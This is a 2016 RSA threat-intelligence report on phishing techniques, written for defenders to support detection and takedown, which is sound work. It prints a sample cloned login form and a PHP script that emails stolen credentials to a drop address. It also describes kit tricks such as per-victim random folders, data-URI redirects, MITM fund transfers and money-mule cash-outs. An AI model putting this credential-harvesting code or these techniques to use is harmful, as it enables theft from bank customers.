Download - A DECADE OF PHISHING
RSA FraudAction Intelligence
A DECADE OF PHISHING November 2016
2
TABLE OF CONTENTS
Introduction ............................................................................................................ 3
How to Set up a Phishing Campaign ........................................................................... 3
Fundamentals ....................................................................................................... 3
How Does Phishing Work in the Real World? ............................................................. 4
Motivation - How Do fraudsters Cash Out? ............................................................... 5
The Many Schemes and Techniques of Phishing ........................................................... 5
The Tax Refund Ploy - Multi-branded Phishing .......................................................... 5
Bulk Phishing Campaigns ....................................................................................... 5
Random Folder Generators ..................................................................................... 6
Local HTML Scheme .............................................................................................. 8
BASE64 encoded Phishing in a URL ......................................................................... 9
Phishing with MITM capabilities ............................................................................... 9
Phishing Plus Mobile Malware in India .................................................................... 12
Fast-Flux Phishing ............................................................................................... 15
Additional Phishing Techniques ............................................................................. 16
3
INTRODUCTION
Our RSA FraudAction forensic analyst looks back on a decade of phishing campaigns that we have
investigated, and also explains the techniques and inner workings of some recently seen schemes.
HOW TO SET UP A PHISHING CAMPAIGN
There is nothing complicated about setting up a phishing campaign. Phishing sites, like any
website, require a hosting facility (domain, IP address, etc.) as well as a software ‘front-end’ and
‘back-end’ (HTML, PHP etc.). Anyone with a little knowledge in web-development can set up a
phishing site without a hassle. Simple phishing sites are generally simple copies of legitimate
customer login pages (front-end), where the action script (that handles the submitted
information) is different from the legitimate one. Owing to this simplicity in the preparation
process, phishing was, is, and will probably remain one of the most desirable scam techniques
performed by fraudsters.
FUNDAMENTALS
What you see in a website is usually composed in HTML (Hyper-Text Markup Language) with the
help of additional client-side scripting/markup languages such as JavaScript and CSS. These
components are responsible for presenting text, pictures, and other graphics. In addition, PHP
(Hypertext Preprocessor) scripts are normally involved to handle the exchange of data and to
perform programming tasks, and fraudsters love it! PHP is a relatively simple to write server-side
scripting language, and it is used by most websites today.
In every phishing site, there is an information form that victims are prompted to fill with
requested details. In HTML, forms are composed like the following example:
<form method=”POST” action=”getdata.php”>
Username: <input type=”text” name=”username” /> <br/>
Password: <input type=”password” name=”password” /> <br/><br/>
<input type=”submit” value=”Login” />
</form>
The example login form above contains two data fields: Username and Password, defined by the
input tag. The third input has a type defined as submit with a value defined as Login – this means
that it will appear on the login screen as a submit button labeled Login. The form tags at the
beginning and end of the script define a form with these fields. The form tag attributes method
and action determine how the data is going to be handled when victim clicks the Login button –
the data will be submitted to the getdata.php handling script via an HTTP POST request.
How do fraudsters usually prepare all of the above? They copy the HTML source code of a
legitimate site’s pages, and change the action attribute to a script they’ve written (usually in
PHP). The easy method is just to get the submitted data and forward it to fraudster’s email
address (a.k.a. the drop email). Here’s an example of a getdata.php script:
<?php
$username = $_POST[‘username’];
$password = $_POST[‘password’];
4
$message = “-----[Best HaXoR Ever]-----\n”;
$message .= “Username: $username\n”;
$message .= “Password: $password\n”;
$message .= “-----[Best HaXoR Ever]-----\n”;
$subject = “Phished data”;
mail(“[email protected]”, $subject, $message);
?>
Although most phishing sites still work in this simplified manner, during the last decade we’ve
seen more advanced phishing techniques develop and evolve.
HOW DOES PHISHING WORK IN THE REAL WORLD?
Being a simple way to do fraud, phishing usually doesn’t attract sophisticated threat actors. In
some cases, they don’t even possess any programming knowledge. Phishing sites are commonly
distributed in underground forums as ‘kits’ packaged as archive files (ZIP, RAR, etc.) that contain
all the resources needed to deploy a working phishing site. Fraudsters simply configure their drop
emails in the relevant files of the kit. It is very comfortable and easy for them to use. However,
distributors or kit developers don’t spend their precious time just to make their ‘clients’ the
fraudsters happy. Many of the kits we have investigated contain hidden or obfuscated code that
forwards the stolen data back to the kit’s author as well as to the end-user fraudster. So, for
example, if 100 fraudsters use these ‘infected’ kits distributed by single kit author, he stands to
harvest all the data stolen by 100 fraudsters, avoiding all the hard work of deploying the kit online
100 times himself.
Once a kit is developed or obtained in the underground, fraudsters need to deploy it in order to
make it available online. Here are two commonly used options for deployment:
Use a hacked website
Buy a site/domain
The first option is usually the more prevalent one. To obtain a hacked website, a fraudster either
hacks it himself, or buys it in underground forums/shops selling compromised sites. The vendor of
such a site provides the fraudster with a link to a ‘backdoor’ script (also in PHP) also known as a
shell that allows them to control and manage the site, uploading and deploying the phishing kit
resources.
When a fraudster has the phishing URL ready (deployed kit on hijacked website), he needs to
distribute it to potential victims. Distribution of phishing URLs is commonly performed via email
messages. However, occasionally fraudsters can be more creative and use additional distribution
vehicles, such as the Google advertisement platform, Facebook, Twitter, etc. Lists of email
addresses are traded and sold in underground forums, and often the price depends on how good
that list is. For example, how close a match there is between the email addresses of people from a
geographic area that matches the targeted entity, and how many of them are active or online, can
affect the price. If fraudster is targeting a British bank, a verified active email address owned by
British citizens will fetch a higher price.
5
MOTIVATION - HOW DO FRAUDSTERS CASH OUT?
Not every financial institution becomes a fraudster’s target. The main qualifying factor is either a
security flaw in the target site, and/or the ease of cashing out or monetizing the phishing process.
For example, knowing that phishing for PII (Personally Identifiable Information) data such as
mother’s maiden name and date of birth tied together with other personal details can help in
transferring money from a victim’s account elsewhere - will definitely draw a scammer’s attention.
Another option is fraudsters selling stolen data in the underground rather than trying to cash-out
the scam by themselves. This also offers the advantage of avoiding drawing attention from law
enforcement authorities and company security departments. The buyers are usually people who
are well versed with how to cash-out, and are also willing to take on the risks involved. One more
option is fraudsters collaborating with ‘money-mules’. The money is transferred to a ‘mule’
account, and the money mule cashes it out for a fee. After the transfer is done, the mules go to
an ATM, draw the stolen money, and transfer it back to the first fraudster via a money
transferring service (Western Union, MoneyGram etc.). Another cashout scheme is purchasing
various products online using stolen credentials, and then re-selling the items. These are just few
examples of common cashout techniques.
THE MANY SCHEMES AND TECHNIQUES OF PHISHING
THE TAX REFUND PLOY - MULTI-BRANDED PHISHING
One phishing scam that Phishers love to use is to bait victims with a supposed tax refund
notification via email - pretending to come from an official government tax/revenue service in
different countries. When victims follow the link, they see a phishing website that has the same
look and feel of the legitimate revenue service site of their country, with a list of all the banks in
that region. The victim is prompted to select their bank and enter personal information to receive
a refund. This ploy enables fraudsters to steal data from customers at several banks at once and
increase their fraud coverage.
BULK PHISHING CAMPAIGNS
Another popular trend is performing phishing campaigns in bulk form. This means that rather than
deploying a single phishing website that is eventually sent to victims, fraudsters deploy them in
bulk, and distribute URLs randomly among phishing emails. This tactic increases the phishing
site’s lifespan and makes the detection and shutdown process a bit harder. Contrary to a usual
phishing site where the scammers use one or two hijacked websites to deploy a phishing kit, the
bulk scheme could encompass dozens of hijacked websites with several phishing directories on
each one, resulting in hundreds of phishing websites. For example:
http://examplesite1.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hkj3k7/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/57askv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/loinc2/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/4jvrgr/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/mnjnde/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/hm37lj/phishing_site/login.html
6
http://examplesite1.com/pathtobulkphish/oxk2hl/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/1be0lv/phishing_site/login.html
http://examplesite1.com/pathtobulkphish/cmq8wz/phishing_site/login.html
.
.
.
http://examplesite2.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite2.com/pathtobulkphish/hkj3k7/phishing_site/login.html
.
.
.
http://examplesite3.com/pathtobulkphish/qwsd21/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/wqpwow/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/ux78nj/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/adhwe1/phishing_site/login.html
http://examplesite3.com/pathtobulkphish/hkj3k7/phishing_site/login.html
.
.
.
Detecting one or two of these URLs and shutting them down can still leave other URLs online. The
randomly generated folder names in these phishing URLs makes them much harder to detect.
Needless to say, when fraudsters host the phishing attacks on domains that they bought, it
complicates the handling of such attacks as there is little or no cooperation from domain
registrants in trying to shut down phishing sites. On the other hand, hijacked website registrants
are often more willing to cooperate and cease the abuse of their websites. These phishing
campaigns are often orchestrated by several threat actors.
RANDOM FOLDER GENERATORS
Some of the newer phishing kits have been observed to generate a new randomized phishing URI
for each new victim accessing the primary phishing link. The victims receive a link (by email or
another distribution method) the redirects them to a folder-generating script. Once the victim
accesses the link, a fresh (URI) folder is generated on the fly, resulting in a ‘personal’ phishing
site dedicated to this instance and this victim. The folders are usually named with a random
sequence of characters, often using the IP address or email address of the victim. In some cases,
the entire folder is deleted as soon as the victim completes entering all of the requested personal
information, and the data is sent off to a phishing drop site or email address.
7
Here is a generic example - the initial link in the phishing email looks like this:
http://somesite.net/folder1/folder2/index.php
The PHP code in the snapshot below is an example of a random folder-generating script.
index.php is a PHP script that creates a random folder and copies all the required resource files
from the phishing kit (html, js, css, images, etc.) to a newly created folder per victim access. In
some cases, instead of a new folder, the index.php script extracts these files from a ZIP archive
sitting in the ‘base’ directory of the phishing campaign, and deploys them as is, using the name of
the archive folder.
Random name
generating function
Randomize the name
some more Logging every access in
file including IP, date, and
browser type
File copying function
Base directory - contents are copied from here
Copy the contents to generated folder and redirect to it
Phishing email • Victim follows a folder-generating URL
Folder-generating
script
• New randomly-named folder is generated • Required files are copied from base directory to
new folder • Victim is redirected to newly generated URL
Newly generated
folder
• Phishing site is presented to victim
8
This scheme is simple to operate, but it complicates detection and shutdown efforts much like
other schemes described here. When one randomly deployed phishing URL is detected, it might be
deleted in minutes, which can mislead security personnel into thinking that the site has been
brought down. In actual fact, the site remains active and online, simply waiting for a new victim
to access the initial link. In order to handle these cases effectively, it is crucial to detect and
shutdown the ‘base’ directory (or archive) that contains initial phishing site and resources.
LOCAL HTML SCHEME
The phishing scheme that is commonly called ‘Local HTML’ involves an HTML file that is attached
to an email message. Victims are prompted to open it and fill out their personal data. The
phishing site contents are placed in a single HTML file (except for the data handling script and
drop point URL that are incorporated in the form tag action attribute described earlier). The script
can be hosted by an online form-handling service, or as a PHP script hosted on a hijacked website.
In both cases, the data is usually sent to the fraudster’s drop email.
Below is a snapshot of Part of a Local HTML contents (form) with a remote drop point URL
From a cyber-security perspective, it may be difficult to shut-down the site when the drop script is
hosted on a hijacked website, as it doesn’t present any abusive content when it is viewed (a blank
page is normally displayed), causing hosting facilities to think it is offline. On the other hand,
online form services are more cooperative in shutting down fraudster accounts.
9
BASE64 ENCODED PHISHING IN A URL
Most major browsers today support a feature called data URI scheme. This feature enables
encoding the webpage content with BASE64 encoding into a string seen in browser address bar.
Fraudsters like using this encoding feature in the Local HTML phishing scheme, as well as in
regular online hosted phishing. When hosted online, it helps scammers to conceal the main
phishing URL. The data URI is injected into the address bar using the JavaScript’s window.location
property or the HTML meta-refresh.
The screenshot below shows the data URI as it appears in address bar.
This is an example of the script for injecting the data URI into the browser address bar.
PHISHING WITH MITM CAPABILITIES
Phishing schemes with Man-In-The-Middle (MitM) capabilities are more sophisticated than most,
and provide fraudsters with more accurate harvested credentials. Phishing with MITM means that
while the victim is interacting with a phishing site, behind the scenes and not visible to the victim,
the phishing site communicates with and performs actions on the legitimate site. This capability is
implemented with PHP cURL module. The cURL is used to transfer data through various protocols
including HTTP. To develop a script that imitates the user’s actions on a legitimate site, some
reverse engineering is required on the part of the fraudster to understand which requests and
data are forwarded to the legitimate site.
10
Below is a code sample illustrating the cURL object used for communicating with the legitimate
online-banking site.
The script in the snapshot below is a cURL class used for communicating with the legitimate online
banking site via an HTTP proxy (xxx.xxx.xxx.xxx:8080).
11
The config.php in the snapshot below contains the fraudster’s account used to receive the stolen
funds transfer.
Another part of the phishing script, seen below, uses the cURL object to transfer funds from the
victim’s account to the fraudster’s account ($cuenta_destino is defined in the config.php shown
above)
The MITM phishing scheme offers a fraudster many advantages – the fraudster can:
Login to the legitimate site to check the validity of stolen credentials
Browse the victim’s account after login to view the account balance
Grab additional personal information such as phone number, address, etc.
In addition, the MITM scheme can be used in combination with an HTTP proxy to hide the phishing
site’s original IP address and use the desired country IP to match that of the victim’s locale. This
results in a low profile in fraud monitoring system logs that flag suspicious activity if actions
carried out on the legitimate site are detected as originating from a region other than the
customer’s or the financial institution’s website locale. Moreover, there are cases where the
phishing kit checked the victim’s account balance, and when it was higher than a given amount, it
transferred the funds to a ‘mule’ account at the same bank through the legitimate site.
These kits/phishing sites are relatively rare as they require higher level coding skills and reverse
engineering of the legitimate websites.
In the best case scenario, MITM phishing only steals valid credentials. In the worst case scenario,
the funds in the account are transferred out almost instantly, making it a very serious threat in
cyber-space.
12
PHISHING PLUS MOBILE MALWARE IN INDIA
Forensic analysts at RSA recently investigated a new phishing trend targeting banks in India. The
Tax Refund scheme described earlier, that operates via a spoofed government revenue service
site, was recently modified to include an SMS message sent to the victim’s phone at the end of
the phishing process. The SMS contains a link that downloads and deploys a malicious APK
(Android mobile malware archive).
This new ploy makes use of a number of schemes and techniques described earlier, including a
random folder generator, BASE64 data URI, tax-refund scheme, and more. The link provided in
the phishing emails leads victims to a redirection URL (performed via the BASE64 data URI). That
URL leads to an outer-frame site, using a script that communicates with a remote SQL database
to retrieve the inner-frame URL.
Phishing email
•Victim clicks on redirection link
Redirection
•Victim is redirected to outer-frame URL
•The redirecting source-code is obfuscated with Unescape
•Redirecting code executes using data URI
Outer-frame
•Communicates with SQL database to get inner-frame URL
•Presents inner-frame hosted on URL different from outer-frame
Inner-frame (folder-
genarator)
•Randomly named folder is generated in random parent directory
•Victim is redirected to a new folder
Phishing site
•Victim is prompted to select a bank
•Victim is prompted to enter personal data including phone number
•Compromised data is sent to remote drop URL
Victim receives
short-URL link via SMS
•The link leads to URL for downloading malicious Andoid application
•Once APK is installed, victim's data on smartphone iscompromised
13
The snapshot below shows part of the outer-frame code – communicating with a remote SQL
database.
The inner-frame phishing URL generates a random folder in a random parent directory, which is
different from the usual folder-generators that create a new folder under the same path. The
phishing site prompts the victims to choose their bank from a long list of Indian banks to begin
the ‘tax-refund’ process. The image below shows the bank selection screen in the phishing site.
14
The kit uses a configuration file containing URLs for the resources needed by the phishing site:
A URL to provide all of the images needed to spoof the legitimate site, instead of grabbing
the images from the legitimate site which can trigger detection
A drop URL that receives and logs stolen data
A URL with the SMS sending script for the malicious APK
A short URL that is sent to victims
The last page file that victims see at the end of the phishing process
The code snapshot below is an example of the phishing site configuration file.
Once the victim finishes going through all the phishing pages, the folder is deleted. To add further
spice to this scheme, upon entering their phone number in this site, the victim receives an SMS
message with a link prompting the download of a malicious APK file (Android application) under
the pretense of ‘mobile verification’.
The random URL generation where links are deleted and created per victim complicates detection
and shut-down by cyber security services. The impact of this trend is beyond ‘regular’ phishing,
since at the end of the process, the victim’s phone is infected by a malicious application. That
mobile malware application keeps on stealing data from the phone long after the personal data
has been phished via a simple phishing site. Since many banks today employ two-factor
authentication using SMS messages for online banking, this malicious app can be even more
harmful – allowing the fraudster control over the phone and the second channel for
authentication.
15
FAST-FLUX PHISHING
One of the oldest and most sophisticated phishing schemes that RSA analysts have investigated
are commonly called Fast-Flux phishing (also known as MS-Redirect, Rock-Phish, and O-late).
These are usually phishing sites hosted on Fast-Flux networks – phishing attack domains that are
hosted at multiple IP addresses that are randomly changed over a period of minutes. Therefore, in
order to bring down these attacks, our analysts can only contact the registrars, as contacting the
ISP/Hosting would not help to get to the root problem. Domains are often generated automatically
in this scheme for the sole purpose of hosting phishing and malware. Each domain contained
dozens of URLs targeting several entities, making campaigns very profitable for the scam authors.
Like any kind of Fast-Flux, the infrastructure (multiple IP addresses) is based on large botnets –
many infected ‘zombie’ computers. It involves a DNS with short TTL of its records in order to
achieve IP addresses randomization.
This scheme is not as common recently as it was in the past.
16
ADDITIONAL PHISHING TECHNIQUES
In addition to the more notable and prevalent phishing schemes we have described, there are a
few more techniques that are available in the phishing arsenal that are not as well known, but are
still out there and are worth noting.
Filtering by Geolocation and Email Address
Some phishing attacks are focused on victims with specific criteria, like geolocation. For instance,
our analysts have witnessed phishing sites that validate their victims by comparing their email
address with a long list of confirmed email addresses for a certain region that the fraudster
obtained earlier. Some phishing emails are sent with email addresses embedded in the URL’s
parameters to make sure that only the people who received the phishing email will be able to
access the fraudulent site.
Make sure victim’s email address is
set in “id” parameter, otherwise
phishing won’t be shown
Check whether the email is
in the list
Check whether it is a returning
victim
Put it in ignore list to avoid
access for second time
If it passed the test,
redirect to phishing page
17
Collecting Statistics
Statistics collection is another popular feature fraudsters like to implement in their attacks.
Sometimes, it is done using online services, but most of the time this feature is incorporates as
part of a phishing kit. User information like screen resolution, IP address, language preferences in
the browser, etc. allows fraudsters to mimic a victim’s online “fingerprint” to try and login to their
online accounts, avoiding detection of online-security monitoring solutions deployed in legitimate
websites.
18
The 419 Scam
The 419 (Nigerian) scam is one of the oldest fraud schemes on the internet. And surprisingly,
enough people still fall victim to this simple and often humorous fictional cover story that
purportedly offers to share millions of dollars with the victim, if only they first provide a small
deposit to start the process… Now, in order to add greater believability or a trust factor to this
scam, fraudsters developed sites that imitate online banking, where the victims are given a set of
prepared account credentials to login. Usually, their name is displayed after they login, and they
can see that there are thousands or millions of dollars in their account. Once they gain this little
measure of the victim’s trust, the rest of the standard 419 scam can be played out more easily.
Smartphones Always At Our Side
We are now living in the ‘smartphone era’, where all sorts of tiny mobile devices with vast
computing and communication abilities are always at our side – fraudsters take into consideration
that victims are now more ‘attached’ to their email than ever before. Many of us check our
messages much more frequently, especially if we have a notification sound set on our device. And
accordingly, more and more fraudsters modify their phishing sites to accommodate mobile
browsers. Therefore, despite the rising awareness of online fraud in the general population and
the media, phishing remains one of the most dangerous cyber-threats.
www.rsa.com
ABOUT RSA
RSA helps more than 30,000 customers around the world take command of their security posture by partnering to build and
implement business-driven security strategies. With RSA's award-winning cybersecurity solutions, organizations can effectively
detect and respond to advanced attacks; manage user identities and access; and reduce business risk, fraud and cybercrime. For
more information, go to www.rsa.com.
ABOUT RSA FRAUDACTION
RSA FraudAction is a managed threat intelligence service which provides global organizations with 24x7 protection and shutdown
against phishing, malware, rogue mobile apps and other cyber attacks that impact their business. Supported by 150 analysts in
RSA’s Anti-Fraud Command Center, the RSA FraudAction service analyzes millions of potential threats every day and has enabled
the shutdown of more than one million cyber attacks.
EMC2, EMC, the EMC logo, RSA, and the RSA logo, are registered trademarks or trademarks of EMC Corporation in the United States and other countries. VMware is a
registered trademark or trademark of VMware, Inc., in the United States and other jurisdictions. © Copyright 2016 EMC Corporation. All rights reserved. Published in the USA.